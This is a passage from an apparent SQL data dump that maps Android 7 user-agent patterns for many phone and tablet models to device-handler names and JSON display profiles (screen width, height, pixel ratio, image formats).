Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BRAVIS X500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BS150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BS250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BSC451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BTV-DL09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BTV-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV4000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV4000Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV4000Pro-RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV6000S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV6000S_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV6000_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV7000 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV8000Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV8000Pro_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV9000-RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BV9000Pro-F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Baccara) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Beeline_Pro_6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Benefit_S505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Blade) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Blaupunkt SL 02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Blaupunkt SL 04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Blaupunkt SM 01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Bluboo S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BlubooS8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Bolt) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Brondi 620 SZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Brondi_730_4G_HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C NOTE 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C NOTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C106-9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C1_Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C5X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C8 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; C9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CITI ATL 4G CS5029ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; COMIO S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; COSMO_L707) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; COTO_T117) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1609) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1707) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1717) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1719) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1721) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1723) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1725) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1727) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1729) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPH1801) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPN-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CPN-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":855,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CS22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CS24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CS40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CUBOT CHEETAH 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CUBOT H3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CUBOT KING KONG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CUBOT MAGIC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CUBOT NOTE Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CUBOT R9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; CUBOT X18) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Capture+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; City) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ClemPhone_7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Cobalt_SM_5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Cobalt_SM_6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Colombia_2018) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Compact) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ConeXis X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Coolpad 3632A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Coolpad E2C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Coolpad E561) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Coral 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Crystal) AppleWebKit/* 